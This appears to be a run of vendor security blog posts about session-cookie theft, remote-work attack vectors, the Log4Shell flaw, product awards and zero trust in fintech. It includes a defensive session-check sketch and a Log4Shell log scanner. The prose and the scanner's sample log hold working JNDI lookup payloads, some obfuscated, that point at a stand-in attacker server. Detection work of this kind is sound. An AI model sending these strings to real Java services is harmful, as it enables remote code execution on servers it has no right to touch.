Cookies are one of the most important web technologies around, even though they are almost as old as the web browser itself. They sometimes have a bad reputation, but there’s no denying that cookies do make our lives a lot easier. They store information that allows us to stay logged in to a site and enjoy a productive experience instead of continually having to re-authenticate and redo the same actions.

However, cookies also represent an opportunity for attackers, who can steal them to conduct a range of illicit activities. For your organization’s SaaS applications, this can lead to the theft or misuse of sensitive data, unauthorized transactions, and much more.

Specifically, we are talking about session cookies. Short-lived session cookies, such as those issued by banking sites that expire after a few minutes of inactivity, are of limited use to attackers. Longer-lived cookies are far more valuable, because they back "active" sessions that can persist for hours or days, leaving a wide window in which a stolen copy still works.

It is important to note that a session cookie is the proof of a completed login. It is issued after the user has passed MFA, so whoever presents it is treated as that user. When an attacker can "pass the cookie", replaying it in a browser session of their own, they impersonate the legitimate user without ever seeing a password or an MFA prompt.

An Ongoing Threat

Session cookies can be stolen in a variety of ways, such as tapping into unsecured Wi-Fi networks, cross-site scripting attacks, phishing, trojans and other malware, and man-in-the-middle attacks.

For a real-world example, consider Raccoon Stealer, one of many infostealer malware families built to harvest browser cookies. The hacking group Lapsus$ reportedly used a session cookie obtained this way to gain unauthorized access to the systems of video game company Electronic Arts. They posed as an existing EA employee and ultimately walked away with hundreds of GB of data, including game source code.

In fact, cookie theft is quite common, with an estimated 22 billion cookie records stolen in 2022.

But the focus of this post is not how SaaS session cookies are stolen or even how to prevent it. Instead, we are looking through a zero-trust lens. So, let’s assume that session cookies have already been stolen, what do you do to mitigate this threat?

Defending SaaS Applications

SaaS applications are critical to doing business today, with the average organization using 130 of them. Session cookies for a SaaS application would give the attacker access to the same information and permissions as the legitimate user. This could include sales transactions and internal files. In the instance of a hijacked web mail session, the attacker could access all the user’s emails, send emails that prompt others to take specific actions which benefit the attacker, and more.

Fortunately, it’s possible – and quite simple – to defend against the hazards of stolen session cookies with Harmony SASE SaaS Protection.

Harmony SASE assigns a unique, static IP address to your organization, and your SaaS applications are configured to accept traffic only from that address. Everything else is denied by default.

So even if an attacker holds an active session cookie, which again bypasses MFA, replaying it from anywhere other than your organization's address is simply rejected by the SaaS server. The cookie is still valid; it just cannot be used from where the attacker is.

Harmony SASE gives you the visibility and control you need to mitigate SaaS security risks.

The easy availability of SaaS means convenient access for your team members, wherever they’re located, but it also gives attackers ample opportunity to probe for security gaps. With 55% of security executives reporting a recent SaaS security incident, it’s clear that the attacks aren’t going away.

In addition to a unique IP address, Harmony SASE also lets you align users’ access and permissions with their roles and responsibilities. This keeps everybody “in their lane” and prevents unauthorized access to applications and data.

Harmony SASE also provides real-time visibility and easy reporting of the users and devices that connect to your SaaS apps. If you ever have reason to suspect unauthorized activity, a user and all their devices can be logged out with the click of a button. This is also handy when an employee leaves, as their access to all SaaS apps can be instantly turned off.
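As an added example (not Harmony SASE's code and not part of the original post), the following Python sketch shows the two controls described above as a SaaS application would enforce them server-side: a session cookie is accepted only when the request arrives from an allowed source network, and all of a user's sessions can be revoked at once. The 198.51.100.0/29 range standing in for the organization's static egress address, the user name and the timestamps are assumptions constructed for the demonstration.

```python
import ipaddress
import secrets
import time

# Constructed for this example: the organisation's fixed egress address range
# (assumption; substitute the static IP your SASE provider assigns you).
ALLOWED_SOURCES = (ipaddress.ip_network("198.51.100.0/29"),)


class SessionStore:
    """Server-side session table that enforces two rules on every request:
    the cookie must be current, and the request must come from an allowed
    source network. Anything else is denied by default."""

    def __init__(self, ttl_seconds=8 * 3600, allowed=ALLOWED_SOURCES):
        self.ttl = ttl_seconds
        self.allowed = allowed
        self._sessions = {}  # cookie value -> (user, expiry timestamp)
        self._by_user = {}   # user -> set of that user's cookie values

    def login(self, user, now=None):
        """Issue a fresh session cookie once the user has completed MFA."""
        now = time.time() if now is None else now
        cookie = secrets.token_urlsafe(32)
        self._sessions[cookie] = (user, now + self.ttl)
        self._by_user.setdefault(user, set()).add(cookie)
        return cookie

    def _source_allowed(self, src_ip):
        ip = ipaddress.ip_address(src_ip)
        return any(ip in net for net in self.allowed)

    def authenticate(self, cookie, src_ip, now=None):
        """Return the user behind a presented cookie, or None when the request
        is rejected. A stolen but still-valid cookie replayed from outside the
        allowed range fails the source check, so the MFA bypass buys nothing."""
        now = time.time() if now is None else now
        entry = self._sessions.get(cookie)
        if entry is None:
            return None
        user, expiry = entry
        if now >= expiry:
            self._drop(user, cookie)
            return None
        if not self._source_allowed(src_ip):
            return None
        return user

    def revoke_user(self, user):
        """Log a user out of every device at once; returns the number of
        sessions invalidated (offboarding, or suspected cookie theft)."""
        cookies = self._by_user.pop(user, set())
        for cookie in cookies:
            self._sessions.pop(cookie, None)
        return len(cookies)

    def _drop(self, user, cookie):
        self._sessions.pop(cookie, None)
        self._by_user.get(user, set()).discard(cookie)


if __name__ == "__main__":
    store = SessionStore()
    t0 = 1_700_000_000.0  # constructed fixed clock so the run is reproducible
    cookie = store.login("alice@example.com", now=t0)
    print(store.authenticate(cookie, "198.51.100.3", now=t0 + 60))   # alice@example.com
    print(store.authenticate(cookie, "203.0.113.50", now=t0 + 60))   # None: replayed off-network
    print(store.revoke_user("alice@example.com"))                    # 1
    print(store.authenticate(cookie, "198.51.100.3", now=t0 + 120))  # None: revoked
```

The source check sits after the cookie lookup only so that expired cookies are cleaned up on the way through; the order does not change the outcome, since every path that is not "valid cookie from an allowed address" returns None.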

Visit our Harmony SASE page to learn more about protecting your SaaS applications.

Illustration of Log4j


Cybercrime and Risk Continue Unabated

Cybercrime and its damages are steadily rising with no sign of stopping. It is estimated that cybercrime will have inflicted $6 trillion worth of damage in 2021.

Look no further than the recently discovered Log4j vulnerability, a flaw in a widely used open-source Java logging library that lets attackers run code of their choosing on servers that log attacker-supplied input through a vulnerable version. Since Log4j is so commonplace (governments, financial institutions, and large companies use it to record activity on their servers), the vulnerability has sent the Internet reeling. It is such a big deal that the Cybersecurity and Infrastructure Security Agency (CISA) has released a scanner for identifying vulnerable web services.

And while the Log4j vulnerability is not the first supply chain vulnerability we’ve faced this year—although it may be the most significant and most widespread—there are other attack vectors equally menacing that shouldn’t be overlooked. According to Perimeter 81’s State of Cybersecurity Report, 87% of companies will have hybrid workers in 2022. The larger attack surface potentially leaves many companies and their employees more susceptible to cybercriminals who will try to exploit the following attack vectors:

1. Credentials

It may feel like a nuisance, but your username and password, credentials, provide you direct access to sensitive information. Criminals also want access to that information. As our CEO Amit Bareket states, “No one should use plain passwords for the master password with password managers like LastPass. The importance of a secure master password cannot be understated. If a hacker gets it, they’ll have access to all of your passwords. It’s much better to use multifactor authentication (MFA, 2FA) or biometric authentication, which cannot be exposed from a phishing attack. Biometric authentication is embedded today in almost every device and should be the option of choice.”

Unsafe habits make it easier for attackers to wreak havoc once they obtain a password. Dangerous behavior includes sharing passwords (giving your credentials to a coworker who is then phished), using easily guessed passwords (built from details visible on your social media), and reusing one password across applications (such as your personal email and your work applications), so that a single leak unlocks all of them.

There are several ways hackers gain access to confidential data, and one of the most common and effective methods is phishing. Phishing is used to mimic an authentic source, such as an email from a colleague or a web service, and tricks users into entering sensitive information, like credentials. After the data has been collected, the hackers use it to their advantage. 

Unfortunately, attackers are also persistent and patient; they keep trying until something lands. With the shift to working from home, many have switched to targeting remote employees. Eventually one of them will get through, which is why a cyber insurance plan belongs in the picture. Insurance acts as a safety net against the cost of a ransomware attack or a leak or breach of confidential data. Choose a comprehensive plan that covers both incident response and legal costs.

2. Trust (and Zero Trust)

Businesses rely on employees, partners, and contractors with access to their internal networks to help protect their private data. Anyone with access to this information can be a threat to company security. IBM Security’s report, The Cost of Insider Threats 2020, lists the top causes of insider threats as negligence, credential theft, and criminal insiders. As previously stated, it is only a matter of time until a hacker is successful.

Remote access exposes networks to more threats than a typical office does: personal devices that may already be compromised or misconfigured, and unsecured internet connections in public places. Attackers can easily eavesdrop on unencrypted data on such networks, but a VPN can encrypt and protect the information sent across them.

Unfortunately, a VPN is not a complete answer: attackers exploit unpatched VPN appliances and weak or legacy protocol configurations, and most often they simply phish for the VPN login credentials themselves. Once inside, they can siphon information without the victim noticing.

Once an attacker is inside a network that trusts anything already connected, they can roam freely because nothing re-verifies them. This is why many companies are switching to a Zero Trust Network Access (ZTNA) model, in which users must be continually verified, including through two-factor authentication. Each company defines when re-verification occurs; some validate users when they switch tasks or after a set period of inactivity.

The ZTNA model also brings strategies that improve security, such as trust zones in which operations with the same level of trust are grouped together. This limits the number of pathways into each zone, making it easier to monitor and harder to get into. The model also offers a way to limit the reach of external users like partners and contractors. Even if one of these outside operators is compromised, you can revoke their access, determine which areas to investigate for stolen information and malicious content, and prevent further loss.

3. Outdated Software and Devices

There are now more devices and weak points for IT departments to manage, and thus more patches, updates, and devices to maintain. Additionally, the average developer has less than five years of cumulative working experience, so it is paramount to select someone who can manage a hybrid workplace. 

This has become increasingly important as cyberattacks rose in 2021. In particular, there was a wave of attacks on on-premises Microsoft Exchange Servers in the summer of 2021. A set of vulnerabilities known as ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) was used to take over business email accounts, after which criminals could mount further attacks from what looked like a legitimate user. Patches had been released months earlier, yet thousands of servers remain unpatched.

Exchange Online (Office 365) and other cloud services were not affected; the flaws were in on-premises Exchange Server. Many companies are moving to cloud services partly for this reason: the provider patches the underlying platform continuously, rather than leaving each customer to track and apply updates.

One study surveyed over 15,000 participants worldwide to learn more about their habits around device updates. It found that 40% of participants felt it was the employer's responsibility to update devices, and 50% clicked "remind me later" when prompted to update their personal devices. This further emphasizes the need for automatic updates and patches to close off exploits of outdated software and devices.

4. Missing or Poor Encryption

Encryption adds an extra layer of security to your sensitive data. Missing encryption leaves a straightforward path for hackers to get at your data, and poor encryption can be quickly broken. 

Some encryption comes built into the systems you already use, such as email encryption and HTTPS, and there has been a rise in virtual private networks (Cloud VPN) that encrypt your online activity. These features are helpful, but they should still be reviewed to confirm they are doing what they are supposed to: protecting your confidential data. Know the vulnerabilities that apply to them and mitigate the risk. There are also several preventative measures you can take to reduce the chance that your VPN leaks information.

5. The Internet Connection

In the New World of Work, which is not so new anymore, 87% of companies have hybrid workers. With so many workers accessing company data from different places, it is paramount to understand, teach, and implement strong Internet connection security habits. Employees should ensure their home routers are running the latest firmware and use a strong, randomly generated password.

Employees work on many collaborative projects, and cloud computing makes all of the data easily accessible. While it may seem counterintuitive to host everything in the cloud, it has become the most reliable and secure way for businesses to store their data.

Summary

This is not a comprehensive list of the tactics used by cybercriminals, but it does highlight the common attack vectors found in the work-from-home workplace. And everyone must be ready. Cybercrime does not happen only to other people or other companies. It can happen to all of us.

According to our study, 66% of companies had a serious cybersecurity incident in 2020-21.  And while 25% did not have any costs or damages from the incident—presumably because they have mitigation techniques in place—the other 75% did. Damage to their reputation. The cost of a ransom. And the costs of downtime or not generating an income. And then there are the cleanup costs. While 18% reported that the costs of a cyber incident were less than $100,000, 47% reported that the costs were between $100,000 and $1 million, and 10% said costs were more than $1 million.

It’s no wonder that many companies are implementing ZTNA using Perimeter 81, a Forrester New Wave ZTNA leader.  

9 G2 Awards


Nine Badges for Zero Trust Networking, Cloud Security and Software-Defined Perimeter

G2, one of the world’s largest online tech marketplaces and software review platforms has named Perimeter 81 as a High Performer for its consistently high customer reviews for Zero Trust Networking, Cloud Security, and Software-Defined Perimeter. Additional awards and badges for Winter 2022 included Momentum Leader, Easiest Admin, Best Support, and Best Relationship.

The G2 software review platform includes more than 1.3 million trusted and verified user assessments covering 100,000 software and service companies in 2,000 categories. These include both quantitative ratings and qualitative reviews about customer likes, dislikes, recommendations, and business use cases. 

Perimeter 81’s High Performer status means that it is one of the highest-ranked cybersecurity solutions in the Zero Trust Networking, Cloud Security, and Software-Defined Perimeter categories. 

In Q3/2021, Perimeter 81 was cited as a Forrester New Wave Leader for Zero Trust Networking Access.

Recent G2 customer reviews include:

  • “The best connection tool I have used (out of many!). As a consultant, I use many different connection tools, and Perimeter 81 is by far the best… Great user experience, can’t recommend highly enough, and I’m using about 20 different similar tools at the moment.”

  • “Best Enterprise VPN. One of the best Enterprise VPN available in the market. The best part is tech support. Literally, in minutes they reply and solve your queries on the same day or within the same hour too. If you are running an enterprise company or startup, I would definitely recommend Perimeter81 VPN.”

  • “Great software VPN solution. The software has a bold and intuitive user interface that displays helpful status information. The software automatically and seamlessly updates itself when required, which is excellent!”

Momentum Leader Badge Cites the Company’s Rapid Growth

Perimeter 81 was also cited as a Momentum Leader. According to G2, the Momentum Grid® highlights high-trajectory products software buyers need to know in today’s ever-evolving tech landscape. Perimeter 81’s ranking was based on user satisfaction scores, employee growth, and digital presence. In addition, the Momentum Grid identifies products that are outpacing industry growth with innovation that meets the evolving needs of their users. 

Thank you to all of our wonderful customers. Your reviews of the world’s first Cybersecurity Experience Platform have helped us achieve these fantastic G2 awards. Your success inspires us, and it’s an honor to keep radically simplifying your cybersecurity in 2022.

 


A Discovery That Shook the Internet

On Thursday, December 9, 2021, a critical zero-day vulnerability in Log4j 2, the logging library used by a large share of Java applications, was publicly disclosed. Tracked as CVE-2021-44228 and nicknamed “Log4Shell”, it stems from Log4j's message lookup feature: when a logged string contains an expression such as ${jndi:ldap://attacker.example/x}, the library resolves it by performing a JNDI lookup against the named server, which can hand back a Java class that the application then loads and runs. The library never asked whether the string it was formatting came from a trusted source. This “100-percent trust” approach means that any attacker-controlled input that reaches a log statement (a User-Agent header, a username, a chat message) is enough to execute the attacker's payload.

As a result, any Internet-facing Java application that logs attacker-influenced input through a vulnerable Log4j 2 version (2.0-beta9 through 2.14.1) can be made to execute commands of the attacker's choosing, including downloading and running malicious code.

The Microsoft Security Response Center reports that most Log4Shell activity to date has been mass scanning and fingerprinting by attackers, probably in preparation for future attacks, as well as scanning by security companies and researchers. Other observed activity has included installing coin miners, deploying Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.

Who or What can be Affected?

The discovery of this zero-day vulnerability has created a virtual earthquake because Log4j is embedded in an enormous number of Java applications and appliances. Any Internet-exposed server running a Java application that bundles an affected Log4j 2 version is at risk. According to Wired magazine and Dark Reading, hundreds of millions of devices are potentially affected. As a result, a lot of companies have been, and still are, very busy upgrading to a patched Log4j release (2.15.0 was the first fix, followed quickly by 2.16.0 and 2.17.0 as follow-on issues were found, so take the latest release rather than the first).

Major tech vendors and services such as Amazon Web Services, Cisco, Google Cloud, IBM, and Microsoft have all reported that some of their services were vulnerable and have been quickly working to fix any issues, release software updates where applicable, and advise customers what they should do.

What We are Doing or Have Done

Since the Log4j flaw was discovered, networking experts at Perimeter 81 have been:

  1. Identifying any potential instances of the vulnerable Log4j code in our environment
  2. Assessing the impact and upgrading our systems and infrastructure where applicable
  3. Mitigating any vulnerabilities with any third-party solutions we use
  4. Having our developer and technical teams fix any software or firmware issues as soon as possible

What You Should be Doing

  1. Closely follow the announcements from Perimeter 81 and your other IT vendors to see if any of your IT resources are at risk
  2. Implement software and firmware patches as soon as they become available for your non-cloud resources
  3. Monitor your network for unusual activity
  4. Communicate with your employees, customers, and partners
  5. If you are using only selected features of Perimeter 81 and have not yet implemented ZTNA, now is the time to start. Please contact our Customer Support for assistance.
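As an added example (not code from the original post or from Perimeter 81), here is what item 3, monitoring for unusual activity, looks like in practice against a web server's access log: a small Python scanner that peels away the lookup-nesting tricks attackers used to hide the jndi token (${lower:j}, ${upper:n}, the ${::-j} default-value form, and percent-encoding) before matching, so that a naive search for the literal string ${jndi: is not the only thing standing between you and a missed probe. The log lines are constructed for the example and the IP addresses are documentation ranges, not real hosts.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once the obfuscation has been peeled away.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Resolve one innermost lookup the way a vulnerable Log4j 2 would, for the
    lookups attackers use to hide the 'jndi' token. Anything else is returned
    untouched so that ${jndi:...} itself survives normalisation."""
    if ":-" in body:  # ${name:-default} and ${::-x} both yield the default
        return body.split(":-", 1)[1]
    func, sep, arg = body.partition(":")
    if sep:
        name = func.strip().lower()
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 16) -> str:
    """Percent-decode once, then repeatedly collapse innermost lookups until
    the string stops changing (bounded, so hostile input cannot spin us)."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalised_line) for every line carrying a JNDI lookup."""
    return [(n, normalize(ln)) for n, ln in enumerate(lines, 1) if is_log4shell_probe(ln)]


# Constructed sample access log (not real traffic): one clean request, three
# probes in increasingly obfuscated forms, and a benign lookup-like string.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:14:16 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:17 +0000] '
    '"GET /?x=${${lower:j}${upper:n}di:rmi://198.51.100.23/a} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '203.0.113.9 - - [10/Dec/2021:03:14:18 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A//198.51.100.23/x%7D"',
    '203.0.113.11 - - [10/Dec/2021:03:14:19 +0000] "GET /docs/${project.version} HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Run against SAMPLE_LOG the scanner reports lines 2, 3 and 4 and stays quiet on the ${project.version} line, because a lookup without a jndi prefix is not a probe. In a real deployment you would feed it the log files of every Internet-facing service that might pass request data to Log4j, and treat a hit as a reason to check whether that host made an outbound LDAP, RMI or DNS connection to the address in the payload.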

Why Perimeter 81 and ZTNA Minimize Your Risk

Perimeter 81 takes a zero-trust approach to its solution and services, which should minimize your risk. If you have implemented Zero Trust Network Access (ZTNA) with Perimeter 81, your servers are not publicly exposed to the Internet, but only to users who meet certain rules and are allowed past your hardware firewall or Firewall as a Service (FWaaS).

There are very few services that must be open to the public Internet, such as a corporate website, and those are easy to track and maintain. Hiding all other internal services behind ZTNA reduces Log4Shell exposure in two ways: an unauthenticated attacker on the Internet cannot reach those services to feed them a crafted lookup string, and controlling the outbound traffic a host may send blocks the second half of the attack, the vulnerable host's JNDI connection back to the attacker's LDAP or RMI server, without which no malicious class is ever fetched. This narrows exposure; it does not remove the flaw, so patching Log4j remains the first priority.

Perimeter 81’s ZTNA significantly reduces the attack surface and potential damage to the internal network since you are able to precisely control and limit any traffic generated from outside or inside the network. This is the opposite of the “100% trust approach” of the Log4j flaw. By segmenting your cloud or hybrid network with ZTNA, you can also prevent the spread of malicious code or activity within your organization’s network and its resources.

SINET16 Innovator Award Winner

 

An “Innovative and Compelling” Cybersecurity Company

The Security Innovation Network (SINET) has selected Zero Trust Network Access and SASE leader Perimeter 81 as a 2021 SINET16 Innovator award winner. The award is given to the 16 most “innovative and compelling” companies addressing cybersecurity threats and vulnerabilities.

The 16 winners were selected from among 190 applicants from 18 countries. The applicants were evaluated in a series of two rounds by the SINET Judging Committee, comprised of 117 Fortune 500 CISOs, government and private industry Risk Executives, and the world’s leading venture capitalists and investment bankers.  

 

Affirmation of Hard Work and ZTNA and SASE Leadership

“Being named a SINET 16 Innovator is an affirmation of our hard work and the strength of our unique product vision,” says Amit Bareket, CEO and Co-Founder at Perimeter 81. “This honor comes at a very thrilling time at the company in which we are rapidly scaling and solidifying our position as a leader in Zero Trust Network Access (ZTNA) and the Secure Access Service Edge.” 

“The era of the classic hardware-based VPN for accessing the corporate network is over,” says Sagi Gidali, CPO and Co-Founder of Perimeter 81. “As we’ve seen in the news, network access in today’s hybrid workplace can only be truly secure through cloud-based Zero Trust Network Access and SASE solutions like Perimeter 81. The Internet has become the corporate network, and employees must be granted access to networking resources based on who they are and what they need to do—not where they are located.” 

Simplifying Cybersecurity for the Hybrid Workforce

Perimeter 81 simplifies cybersecurity and secure network access for the hybrid workforce by transforming multiple outdated, complex, hardware-based network security technologies into a single, easy-to-use, cloud-based security platform, including Zero Trust Network Access, Firewall as a Service, VPN as a Service, Device Posture Security and more. The company’s offering is designed to be easy to buy, quick to implement, and simple to use on a day-to-day basis, both for IT professionals and non-technical users of networking resources.

Perimeter 81 improves network visibility and delivers seamless onboarding and full integration with AWS, Azure, Google Cloud, Splunk, and other major cloud providers. Since its founding in 2018, Perimeter 81 has been selected for numerous other awards, including Forrester’s New Wave Leader for ZTNA, Deloitte’s Technology Fast 500, Gartner Cool Vendor recognition, the Red Herring Top 100, CRN Emerging Vendor, and more.

“I am excited to announce this year’s class of the SINET16 Innovators who are emerging as leaders in their field and paving the way for critical security advancements into multiple government agencies and industry sectors,” said Robert D. Rodriguez, Chairman of SINET. “We look forward to watching these companies continue to grow and help protect our national security and economic interests.”

Read more about Perimeter 81’s ZTNA leadership in The Forrester New Wave™ Zero Trust Network Access Report Q3/2021.

Illustration Forrester ZTNA Leader

 

Intuitive and Modern ZTNA Management

Forrester has named Perimeter 81 as a Zero Trust Network Access leader and gave Perimeter 81 the highest marks possible in the nonweb and legacy apps, client support, product vision, and planned enhancements criteria.    

The leading technology consultancy found that “Perimeter 81’s ZTNA management is intuitive and modern. Its ability to handle nonweb applications like VoIP is a major differentiator in this field.” In addition, they noted that Perimeter 81 is “the best fit for smaller enterprises that need ZTNA as a service, quickly. [Its] self-service portal allows smaller organizations to sign up quickly and onboard dozens of applications in less than a month.”

In addition, the independent analyst also noted that “Perimeter 81 reference customers are among the most enthusiastic of those included in this evaluation. They extol the vendor relationship, support, and dedication to improving the product quickly.”

 

Validating Our Strategic Direction

“We are thrilled that Forrester has named Perimeter 81 a leader in Zero Trust Network Access,” says Amit Bareket, CEO and Co-Founder at Perimeter 81. “This recognition validates for us our strategic direction for enabling secure network access in the hybrid workplace. There is one company network called the Internet, and employees need to access networking resources  based on who they are and what they need to do—not where they are located.”

The Forrester New Wave™ report is Forrester’s evaluation of top products in an emerging technology market. In the report, Forrester assesses these products’ core capabilities and strategies and enables companies to make well-informed decisions without spending months conducting their own research.

For the New Wave™ Zero Trust Network Access Report Q3 2021, Forrester examined the 15 most significant vendors in this category.


 

Recent Breaches Show Need for Secure Access

“The downside of flexible, hybrid work is that it has increased the attack surface of every company,” says Sagi Gidali, CPO and Co-Founder of Perimeter 81. “The recent wave of data breaches and ransomware, from the Colonial Pipeline to the T-Mobile breach, has demonstrated that secure access is a must-have for businesses of all types and sizes. As a young, rapidly growing company, we are especially grateful for the industry recognition in The Forrester New Wave report and our customers’ high level of enthusiasm. We believe both are a testament to our determination to provide the highest levels of cybersecurity with a relentless commitment to our customers’ success.”

Perimeter 81 improves network visibility and delivers seamless onboarding and full integration with AWS, Azure, Google Cloud, Splunk, and other major cloud providers. Since its founding in 2018, Perimeter 81 has been selected for numerous other awards, including Deloitte’s Technology Fast 500, Gartner Cool Vendor recognition, the Red Herring Top 100, CRN Emerging Vendor, and more.

Our First In-Person Show Since Covid

We were super excited to be back this year for Black Hat USA’s hybrid event. We’d arranged to have a booth on the floor of the Mandalay Bay in Las Vegas as well as a virtual booth in which visitors could stop by and request a live product demonstration.

Our theme was built around our SASE for Superheros eBook (definitely worth a read!). We took a fun and light-hearted approach, in true Black Hat style. It was also well-suited for coming out of our Covid-induced hibernation.

We had a caricature artist at the booth to transform security pros into organizational superheroes, as well as some great swag, including wireless earbuds, wireless speakers, and cool stickers (an homage to one of our founders' first startup as a nine-year-old kid).

 

A Pre-Show Surprise

Preparations for the exhibition and travel plans seemed fairly normal. It felt good to have Covid behind us. But then, bit by bit, the Delta variant was all over the news. It started to cast a shadow over the whole event, but we were hopeful.

Then on August 1, just days before the show, the organizers announced that exhibitors and visitors would need to wear masks inside and that the requirement would be strictly enforced.

Would this reduce attendance?

Coexisting with a New Mask Mandate

Black Hat 2021 was nothing like the pre-Covid days with tens of thousands of visitors. But that doesn’t mean it wasn’t a success. The hybrid combination of having a virtual and in-person event was smaller, but attendees were much more ready to do business.

The Delta variant, and the show's mask mandate, may have kept the tourists away, but the IT pros and CISOs who came to see the best technology on the market and hear from industry leaders were not disappointed. Leads were fewer but more serious, and interest in demos was high. With ransomware on the rise, interest in SASE and Zero Trust Network Access is strong.

Having a parallel virtual event was good, but it didn’t offer the same dynamics as approaching a passerby on the show floor.

 

Perimeter 81 team at Black Hat 2021

 

The Show Must Go On

Despite the challenges, Black Hat 2021 was indeed successful. Virtual attendees said that they hope to attend in person next year, but it’s clear that Covid still has a major effect on events. This is especially true with the sudden outbreak of the Delta variant.

Like the hybrid workplace, hybrid events are here to stay for the foreseeable future, possibly forever. It’s challenging today to plan for exhibitions because changes can happen in an instant. 

The bottom line is that you need to stay resilient—like your network. 

 

Though the ripples are gentler than they once were, the wake of the 2008 financial crisis is still felt today. Financial regulators around the world have since adopted laws that increase transparency and scrutiny alike, making it difficult for traditional banks to operate as opaquely as they once did. This has opened the market wide for the tech-assisted financial services that people like to call fintech.

It is a mistake to assume that fintech innovations come from independent programmers or garage development shops, though technology has lowered the barriers to entry for providing financial services. Almost all of the world's biggest banks and institutions invest heavily in fintech for their own products in order to stay competitive, and accordingly the market is enormous, estimated to claim upwards of $4.7 trillion of the sector's total revenue.

However, opening a market may also mean exposing something within it, and alongside a rash of serious breaches in the last decade, fintech’s pace of innovation is now threatened by its inability to be a trustworthy custodian of customer data.

Technology Both a Catalyst and a Cure

The fintech sector is responsible for many new ideas. Some of them are improved versions of products and investment instruments that we already have. For example, an online lender can use an algorithm to match someone's credit profile with applicable lenders, complete a credit check, and approve the loan within 24 hours. Other ideas, like crowdfunding, robo-advisors, and mobile payments, are entirely new and could only have come into existence with modern technology.

Despite the added convenience of fintech services, customers are increasingly concerned about the handling of their personal and financial data. The July 2020 breach of Dave, a US-based fintech, exposed the details of 7.5 million users on the dark web. Further breaches in the sector have caught regulators' attention as well.

When using fintech services, you must enter your credit and identification details into an online database. This information trades hands, and is processed and sometimes even stored or shared externally. While it may result in a loan approval 100 times faster than going to your local bank, meeting with a loan agent, and filling out forms, fintech comes with risks that customers shouldn’t be forced to consider.

Even after GDPR laws went into effect, cyberattacks on EU companies continued to increase, reaching a rate of one attack every five minutes, and the damage hurts customers, the fintech’s brand and its bottom line. For organizations in the sector, innovation and the intricacy of data structures have resulted in growth, even while customer trust may lag behind. Regulations like GDPR and MiFID II are pushing back against this lag in trust, just in time for technology like Zero Trust security to provide an answer.

Zero Trust: Few Can Step Into the Vault

What makes a brick-and-mortar bank so safe? Because banks trust no one. Not visitors, not customers and not employees. Cameras watch all entrants and occupants. The bank’s money is tucked away behind layers of security, including many walls and floors. Only a few employees have access to the vault—where the customers’ most sensitive possessions are—and there are alarms everywhere.

So how can online financial services providers achieve this same level of security? 

Online finance companies and banks can regain the confidence of the market by using Zero Trust solutions. At a time when hackers are increasingly sophisticated, Zero-Trust Security solutions trust no one and grant access to network resources only after the identity of a user has been confirmed.

Zero Trust solutions offer the following techniques to give IT teams control over which employees can access various parts of the network:

  • Segmented policy access: Zero Trust creates specific user access policies at the individual application and file level, rather than providing full access to any employee who has a password. Employees of financial institutions receive access to the least amount of sensitive resources required to do their jobs and no more. This significantly reduces the number of relevant targets for hackers and decreases the potential impact of employees with less-than-ideal security habits. However, access is often synonymous with speed, and banks that deliver high levels of customer service using “universal bankers” can rely on other aspects of Zero Trust.
  • Network monitoring: Monitoring the network activity of users is a central aspect of Zero Trust and is the online equivalent of the cameras that watch and record all activity inside the brick-and-mortar bank. A central management dashboard reduces the manpower requirements of monitoring and can also funnel data to other processing tools that look for deeper insights. Suspicious activity is completely visible to IT, which can then assess the threat and take mitigating action if necessary. Zero Trust also offers concrete proof, or a historical record, for insurance purposes and compliance reporting.
  • Secure network access: Multiple layers of identification and protection at the edge of the network require employees to first connect through an application before being granted access to network resources. Encrypted IPsec tunnels, provided by a standard business VPN or IPsec VPN, stretch across both the network and the cloud. Additional cybersecurity safeguards include automatic Wi-Fi protection (which cuts the internet off should the VPN connection fail), multi-factor authentication for additional device-based security, and DNS filtering tools that limit access to potentially dangerous Internet content.

Trust is an Achilles’ Heel

With Zero Trust tools, IT teams at banks and fintech companies can safely abandon the antiquated defenses they posted at the network perimeter. Zero Trust lets them build a more agile, aggressive security apparatus that focuses on users and employees. This is important because financial breaches often occur due to employee sloppiness or negligence rather than an intrepid hacker genius. Two cases in point: Equifax’s failure to install a software patch affected 143 million people in the USA, and JP Morgan’s failure to enable two-factor authentication on critical servers resulted in the exposure of the names, addresses, phone numbers and e-mail addresses of 83 million account holders.

Since hackers search endlessly and repetitively across employees, devices, and systems for these kinds of human errors, Zero Trust not only makes such gaps less common but also reduces their impact. It’s the type of safety net that helps organizations like healthcare providers and financial service providers comply with industry regulations and meet customer expectations without reducing their pace of innovation.

Zero Trust is an alternative IT security model that remedies the shortcomings of legacy technology by removing the assumption of trust.

Under the guiding principle, “Never trust, always verify”, Zero Trust restricts access to the entire network by isolating applications and segmenting network access based on user permissions, authentication and verification.

Conventional security models that “trust, but verify”, fail to meet increasingly sophisticated cyber threats, hyper interconnectivity, globalization and user mobility. By assuming everything “on the inside” can be trusted, these legacy technologies are, for the most part, no longer effective.

Zero Trust network security ensures policy enforcement and protection for all users, devices, applications and data, regardless of where they’re connecting from.

This user-centric approach makes the verification of authorized entities mandatory, not optional.

The Benefits of Adopting Zero Trust Principles

